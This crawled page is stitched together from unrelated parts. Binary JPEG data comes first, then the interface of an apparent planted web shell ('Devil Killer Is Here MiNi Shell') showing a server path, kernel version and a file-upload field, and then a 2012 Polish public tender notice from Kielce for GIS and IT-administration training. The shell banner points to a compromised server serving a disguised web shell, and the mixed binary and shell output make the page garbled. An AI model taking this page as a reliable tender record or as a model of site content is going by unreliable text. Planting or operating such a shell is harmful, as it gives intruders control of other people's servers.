JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120622/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120622/215764-N-2012.html

<p class="kh_header"><b>Kielce: Kompleksowa realizacja 
merytoryczna i obsługa techniczno-logistyczna 
usług szkoleniowych z zakresu systemu informacji przestrzennej ( SIP)</b><br>
<b>Numer ogłoszenia: 215764 - 2012; data zamieszczenia: 22.06.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Województwo Świętokrzyskie - Urząd Marszałkowski Województwa Świętokrzyskiego , al. IX Wieków Kielc 3, 25-516 Kielce, woj. świętokrzyskie, tel. 41 3421901, 3421677, 3421576, faks 41 3445265, 3445723.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.sejmik.kielce.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Kompleksowa realizacja 
merytoryczna i obsługa techniczno-logistyczna 
usług szkoleniowych z zakresu systemu informacji przestrzennej ( SIP).</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest organizacja i realizacja szkoleń  z zakresu systemu informacji przestrzennej ( SIP),związanych z realizacją projektu pn: Rozwój systemu kluczowych obszarów funkcjonowania i kompetencji kadr Urzędu Marszałkowskiego Województwa Świętokrzyskiego realizowanego przez Urząd Marszałkowski Województwa Świętokrzyskiego współfinansowanego z Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki w ramach Priorytetu V Dobre Rządzenie, Działania 5.2-Wzmocnienie potencjału administracji samorządowej, Poddziałania 5.2.1 Modernizacja zarządzania w administracji samorządowej. 
2.	Przedmiot zamówienia został podzielony na 2 części i obejmuje następujące szkolenia
CZĘŚĆ I
Moduł I-Szkolenie: Wprowadzenie do systemów informacji przestrzennej SIP  i możliwości zastosowania technologii SIP w działaniach praktycznych.
Moduł II-Szkolenie: Specjalistyczne, certyfikowane szkolenie z zakresy narzędzi SIP: GeoMedia Proffesional, GeoMedia Sdi Pro, GeoMedia Web Map Proffesional, związane tematycznie z realizacją projektu GUGiK  Geoportal2

CZĘŚĆ II
Moduł I- Szkolenie Specjalistyczne, certyfikowane z zakresu administrowania oprogramowaniem systemowym kurs podstawowy (cz.1) - Szkolenie MS6420 Fundamentals of Windows Server_2008
Moduł II- Szkolenie Specjalistyczne, certyfikowane z zakresu administrowania oprogramowaniem systemowym  - administrator  systemu (cz.2) Szkolenie MS6427 Configuring and Troubleshooting Internet Information Services  
Moduł III- Szkolenie Specjalistyczne, certyfikowane z zakresu administrowania oprogramowaniem systemowym  - administrator systemu (cz.3 + egz.)-Szkolenie MS6421 Configuring and Troubleshooting a Windows Server 2008 Network
 Moduł IV- Szkolenie Specjalistyczne z zakresu administrowania oprogramowaniem bazodanowym - Szkolenie 5115 Oracle Database 11g Administration Workshop I 
Moduł V- Szkolenie Specjalistyczne z zakresu administrowania oprogramowaniem narzędziowym dla administracji -Szkolenie 5148 Oracle Database 11g Administration Workshop II 
3.	Wykonawca w ramach przedmiotu zamówienia zobowiązany będzie do: 
a)	Przeprowadzenia zajęć szkoleniowych z wykorzystaniem form wykładowych oraz ćwiczeń praktycznych z użyciem odpowiednich materiałów zgodnych z tematyką szkolenia;
b)	Przygotowania po 1 egzemplarzu materiałów szkoleniowych dla każdego uczestnika danego szkolenia; 
c)	Zapewnienia kadry o odpowiednim wykształceniu i doświadczeniu w prowadzeniu szkoleń poświadczone odpowiednimi dokumentami. 
d)	Zapewnienia ciągłości prowadzenia szkoleń w terminach wskazanych przez Zamawiającego; 
e)	Zapewnienia zastępstwa w przypadkach kiedy wybrany trener szkoleniowiec nie może z przyczyn obiektywnych poprowadzić szkolenia; 
f)	Wyznaczenia osoby do kontaktu z Zamawiającym, odpowiedzialnej za dbałość o wysoką jakość zajęć i upoważnionej do podejmowania wiążących decyzji w kwestiach związanych z realizowanymi szkoleniami;
g)	Przygotowania i prowadzenia dokumentacji ze szkoleń, w tym list obecności, dzienników szkoleń, ankiet ewaluacyjnych, sprawozdań z przeprowadzonych szkoleń i egzaminów zgodnie z wzorami przekazanymi przez Zamawiającego; 
h)	Oznakowania pomieszczeń w których będą odbywały się zajęcia zgodnie z aktualnymi wytycznymi Ministra Rozwoju Regionalnego w zakresie informacji i promocji Programu Operacyjnego Kapitał Ludzki, a także zamieszczenie znaków: logo Kapitał Ludzki Narodowa Strategia Spójności, logo Europejskiego Funduszu Społecznego, logo Unii Europejskiej, logo Urzędu Marszałkowskiego Województwa Świętokrzyskiego oraz umieszczenie informacji o współfinansowaniu szkoleń ze środków Europejskiego Funduszu Społecznego w postaci plakatów informacji o treści: Projekt konkursowy Rozwój systemu kluczowych obszarów funkcjonowania i kompetencji kadr Urzędu Marszałkowskiego Województwa Świętokrzyskiego realizowany przez Urząd Marszałkowski Województwa Świętokrzyskiego współfinansowanego ze środków Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki, Priorytet V - Dobre rządzenie, Działanie 5.2. - Wzmocnienie potencjału administracji samorządowej, Poddziałanie 5.2.1 Modernizacja zarządzania w administracji samorządowej;
i)	Szkolenia będą odbywały się zgodnie z Harmonogramem szkolenia, który zostanie przekazany Wykonawcy przez Zamawiającego najpóźniej 14 dni przed terminem rozpoczęciem szkolenia ( chyba, że strony ustalą termin krótszy). 
j)	Zapewnienie wszystkim uczestnikom usług cateringowych (w cenie szkolenia), podawanych przed rozpoczęciem zajęć, w przerwie oraz w trakcie trwania zajęć: kawy, herbaty, mleka do kawy, cukru, wody mineralnej, ciastek
k)	Zapewnienie oprócz usług cateringowych wymienionych w pkt. 2 lit. j) zakwaterowania uczestnikom szkolenia w trakcie trwania szkolenia - pokoje maksymalnie 2 osobowe z łazienkami, w hotelu minimum trzy gwiazdkowym lub ośrodku szkoleniowym o porównywalnym standardzie oraz zapewnienie usług gastronomicznych- pełnego wyżywienia (śniadanie ) szwedzki stół; obiad składający się z dwóch dań, sałatki, napój; kolacja) dla szkoleń wyjazdowych.
l)	Ubezpieczenie uczestników szkolenia od Następstw Nieszczęśliwych Wypadków od pierwszego do ostatniego  dnia szkolenia. W razie wystąpienia wypadku, Wykonawca będzie zobowiązany do sporządzenia protokołu okoliczności i przyczyn wypadku związanego ze szkoleniem w drodze do i z miejsca szkolenia powstałego z udziałem pracownika UMWŚ skierowanego na szkolenie przez Zamawiającego.
5	Nazwa i kod Wspólnego Słownika Zamówień (CPV): 
80.50.00.00-9	usługi szkoleniowe
80.53.31.00-0 usługi szkolenia specjalistycznego
6.	Zamawiający dopuszcza składanie ofert częściowych. Wykonawcy mogą składać oferty na jedną lub dwie części zamówienia. 
7.	Szczegółowy opis przedmiotu zamówienia dla poszczególnych modułów szkoleń wchodzących w skład poszczególnych części zamówienia zawarty został w Załączniku Nr 1 do SIWZ.
8.	Szczegółowe zasady określające sposób rozliczeń oraz wysokość kar umownych zawarte zostały w dodatku Nr 5 do SIWZ - Wzór umowy..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 80.53.31.00-0, 38.22.10.00-0, 72.42.10.00-7, 72.51.10.00-0.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 28.09.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Nie wymagane</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Nie dotyczy</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy posiadają odpowiednią wiedzę i doświadczenie niezbędne do wykonania zamówienia, tj. w ciągu ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres działalności jest krótszy - w tym okresie, wykonali należycie
dla I części zamówienia minimum 2 usługi polegające na przeprowadzeniu szkoleń odpowiadających tematyce przedmiotu zamówienia w I Module dla minimum 25 osób  oraz minimum 2 usługi polegające na przeprowadzeniu szkoleń dla co najmniej 4 osób z zakresu GIS SDI, z wykorzystaniem oprogramowania GeoMedia Professional
dla II części zamówienia minimum 1 usługę polegającą na przeprowadzeniu szkoleń dla co najmniej 2 osób, odpowiadających tematyce przedmiotu zamówienia w Module I, II, III oraz minimum 1 usługę polegającą na przeprowadzeniu szkoleń co najmniej 2 osób, odpowiadających tematyce przedmiotu zamówienia w Module IV i V
Zamawiający oceni spełnianie tego wraunku metodą spełnia nie spełnia na podstawie wykazu usług wg wymagań określonych wyżej, wykonanych w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres działalności jest krótszy - w tym okresie- wg wzoru określonego w dodatku nr 3A i 3B do SIWZ, który stanowić będzie kolejny załącznik do oferty wykonawcy, oraz załączenia dokumentów potwierdzających, że usługi te zostały wykonane należycie (oryginał lub kopia poświadczona za zgodność z oryginałem przez wykonawcę
Uwaga ! W przypadku podania wartości danego zamówienia w walucie obcej, zamawiający dokona przeliczenia tej wartości na wartość w złotych według średniego kursu NBP dla danej waluty z dnia publikacji ogłoszenia o zamówieniu w  Biuletynie Zamówień Publicznych. Jeżeli w dniu ukazania się ogłoszenia o zamówieniu, NBP nie opublikuje informacji o średnim kursie walut, Zamawiający dokona odpowiednich przeliczeń wg. średniego kursu z pierwszego, kolejnego dnia, w którym NBP opublikuje ww. informacje.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy dysponują odpowiednim potencjałem technicznym. Zamawiający oceni spełnianie tego warunku na podstawie oświadczenia Wykonawcy wg wzoru stanowiącego dodatek nr 2A do SIWZ-oryginał</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy dysponują odpowiednimi osobami zdolnymi do wykonania zamówienia, tj. :
dla I części zamówienia zapewnią 
dla Modułu I minimum jednego trenera posiadającego doświadczenie w prowadzeniu co najmniej 3 szkoleń z zakresu wykorzystania narzędzi GIS, tematyki infrastruktur danych przestrzennych oraz INSPIRE, posiadającego publikacje w literaturze naukowej oraz czasopismach krajowych i zagranicznych, w tym: co najmniej 5 publikacji w czasopismach krajowych, co najmniej 2 publikacje w czasopismach zagranicznych z tematyki SDI i INSPIRE oraz dla Modułu II minimum jednego trenera posiadającego publikacje w literaturze naukowej oraz czasopismach krajowych i zagranicznych, w tym: co najmniej 5 publikacji w czasopismach krajowych, co najmniej 2 publikacje w czasopismach zagranicznych z tematyki SDI i INSPIRE oraz doświadczenie w prowadzeniu co najmniej 3 szkoleń z zakresu wykorzystania narzędzi GIS, tematyki infrastruktur danych przestrzennych oraz INSPIRE posiadającego aktualną certyfikację z zakresu oprogramowania Geomedia WebMap dla INSPIRE lub równoważny, oraz doświadczenie w prowadzeniu co najmniej 3 szkoleń z zakresu wykorzystania narzędzi GIS oraz tematyki infrastruktur danych przestrzennych
dla II części zamówienia zapewnią 
dla Modułu I, II i III minimum jednego trenera posiadającego doświadczenie w postaci przeprowadzenia minimum 1 szkolenia odpowiadającego tematyce przedmiotowi zamówienia określonego dla Modułu I , II i III. Trener musi być autoryzowanym wykładowcą Microsoft oraz posiadać certyfikat MCP lub równoważny oraz dla Modułu IV i V minimum jednego trenera posiadającego doświadczenie w postaci przeprowadzenia minimum 1 szkolenia odpowiadającego tematyce przedmiotowi zamówienia określonego dla Modułu IV i V. Trener musi być autoryzowanym wykładowcą Oracle oraz posiadać certyfikat OCP11g lub równoważny
Osoby (trenerzy), wymienione w wykazie dla poszczególnych części zamówienia nie mogą się powtarzać  z uwagi na fakt nakładania się okresów wykładów, które prowadzić będą w różnych częściach zamówienia.Wykonawca musi zabezpieczyć odpowiednią liczbę trenerów, zgodnie z postawionym warunkiem w powyższym zakresie 
Zamawiający oceni spełnianie tego warunku metodą spełnia nie spełnia na podstawie wykazu osób, które będą uczestniczyć w wykonaniu zamówienia wg wymagań określonych wyżej- wg wzoru określonego w dodatku nr 4A i 4B do SIWZ, który stanowić będzie kolejny załącznik do oferty wykonawcy (oryginały lub kopie poświadczone za zgodność z oryginałem przez wykonawcę). 
UWAGA: Wykonawca, który będzie polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów (art. 26 ust. 2b) zobowiązany jest do złożenia w szczególności pisemnych zobowiązań tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia - oryginał podpisany przez podmiot.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia. Zamawiający oceni spełnianie tego warunku na podstawie oświadczenia Wykonawcy wg wzoru stanowiącego dodatek nr 2A do SIWZ-oryginał</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.	Wypełniony Formularz oferty - wg wzoru określonego w Dodatku nr 1 do SIWZ.
2.	W przypadku wspólnego ubiegania się o udzielenie zamówienia Wykonawców występujących wspólnie (w tym spółki cywilne) - pełnomocnictwo do reprezentowania 
w postępowaniu o udzielenie zamówienia publicznego albo reprezentowania 
w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego (oryginał lub poświadczona notarialnie kopia). 
3.	Pełnomocnictwo określające jego zakres - w przypadku, gdy Wykonawcę reprezentuje pełnomocnik (oryginał, poświadczona notarialnie kopia).</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.Zakazuje się istotnych zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, z zastrzeżeniem pkt. 2, 3,4,5. 
2.	W szczególnie uzasadnionych przypadkach Wykonawca może dokonać wymiany osób delegowanych do wykonania przedmiotu umowy. W takiej sytuacji Wykonawca wskaże osobę/y o co najmniej takich samych kwalifikacjach. Zmiana ta nie wymaga formy pisemnej, o której mowa w ust. 1.
3.	W szczególnie uzasadnionych przypadkach termin zakończenia szkoleń może ulec zmianie, pod warunkiem zaakceptowania tych zmian przez strony umowy oraz pod warunkiem, że szkolenia odbędą się w dni powszednie tj. od poniedziałku do piątku. 
4.	W szczególnie uzasadnionych przypadkach Wykonawca (szkolenia wyjazdowe) może zmienić miejsce zorganizowania szkolenia, z zastrzeżeniem, że miejsce to będzie poza granicami administracyjnymi miasta Kielc jednak nie dalej niż 400 km, spełni wszystkie wymagania określone w załączniku nr 1 do SIWZ i nie spowoduje zmiany ceny zaoferowanej w ofercie.
5.	Zamawiający dopuszcza możliwość zmiany ceny umowy po przeprowadzeniu negocjacji i zawarciu stosownego aneksu w przypadku ustawowej zmiany stawki podatku od towarów i usług VAT dla przedmiotu umowy. 
6.	Wykonawcy nie przysługuje roszczenie o zwrot kosztów wynikających bezpośrednio lub pośrednio z wymiany osób, wyznaczonych przez Wykonawcę do wykonania przedmiotu zamówienia.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.sejmik.kielce.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Siedziba Zamawiającego AL.IX Wieków Kielc 3; 25-516 Kielce budynek C-2 III pietro pokój nr 347.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 05.07.2012 godzina 12:00, miejsce: Siedziba Zamawiającego AL.IX Wieków Kielc 3; 25-516 Kielce budynek C-2 I pietro pokój nr 146 ( Kancelaria ogólna).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> projekt pn: Rozwój systemu kluczowych obszarów funkcjonowania i kompetencji kadr Urzędu Marszałkowskiego Województwa Świętokrzyskiego realizowanego przez Urząd Marszałkowski Województwa Świętokrzyskiego współfinansowanego z Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki w ramach Priorytetu V Dobre rządzenie, Działania 5.2-Wzmocnienie potencjału administracji samorządowej, Poddziałania 5.2.1 Modernizacja zarządzania w administracji samorządowej..</p>
